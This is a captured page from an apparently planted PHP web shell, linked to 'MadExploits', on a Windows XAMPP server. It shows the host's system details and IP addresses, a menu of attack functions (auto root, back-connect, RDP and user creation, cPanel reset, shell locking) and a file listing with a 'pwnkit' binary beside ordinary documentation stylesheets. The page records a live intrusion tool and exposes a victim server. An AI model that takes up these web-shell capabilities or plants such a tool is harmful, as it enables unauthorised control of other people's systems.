Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.139
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
php /
pear /
PHP /
UML /
Output /
Html /
[ HOME SHELL ]
Name
Size
Permission
Action
resources
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
Exporter.php
864
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
allclasses-frame.xsl
1.58
KB
-rw-rw-rw-
classifier.xsl
16.89
KB
-rw-rw-rw-
documentation-common.xsl
8.15
KB
-rw-rw-rw-
documentation-generator.xsl
8.28
KB
-rw-rw-rw-
index-all.xsl
5.79
KB
-rw-rw-rw-
index.xsl
1.71
KB
-rw-rw-rw-
main.xsl
689
B
-rw-rw-rw-
overview-frame.xsl
1.38
KB
-rw-rw-rw-
overview-summary.xsl
4.94
KB
-rw-rw-rw-
package-frame.xsl
2.73
KB
-rw-rw-rw-
package-summary.xsl
5.73
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.xsl
<?xml version="1.0" encoding="iso-8859-1"?> <xsl:stylesheet version="1.0" exclude-result-prefixes="uml xmi" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:uml="http://schema.omg.org/spec/UML/2.1.2" xmlns:xmi="http://schema.omg.org/spec/XMI/2.1"> <xsl:template name="index"> <xsl:param name="containerName" select="@name"/> <html> <xsl:call-template name="htmlStartPage"/> <xsl:call-template name="htmlHead"> <xsl:with-param name="path" /> <xsl:with-param name="title" select="concat($containerName, ' API Documentation')"/> </xsl:call-template> <script type="text/javascript"> <![CDATA[ targetPage = "" + window.location.search; if (targetPage != "" && targetPage != "undefined") targetPage = targetPage.substring(1); function loadFrames() { if (targetPage != "" && targetPage != "undefined") top.classFrame.location = top.targetPage; } ]]> </script> <frameset cols="20%,80%" title="" onLoad="top.loadFrames()"> <frameset rows="30%,70%" title="" onLoad="top.loadFrames()"> <frame src="overview-frame.html" name="packageListFrame" title="All Packages" /> <frame src="allclasses-frame.html" name="packageFrame" title="All classes and interfaces (except non-static nested types)" /> </frameset> <frame src="overview-summary.html" name="classFrame" title="Package, class and interface descriptions" scrolling="yes" /> <noframes> <h2>Frame Alert</h2> <p> This document is designed to be viewed using the frames feature. If you see this message, you are using a non-frame-capable web client.<br/> Link to<a HREF="overview-summary.html">Non-frame version.</a> </p> </noframes> </frameset> </html> </xsl:template> </xsl:stylesheet>
Close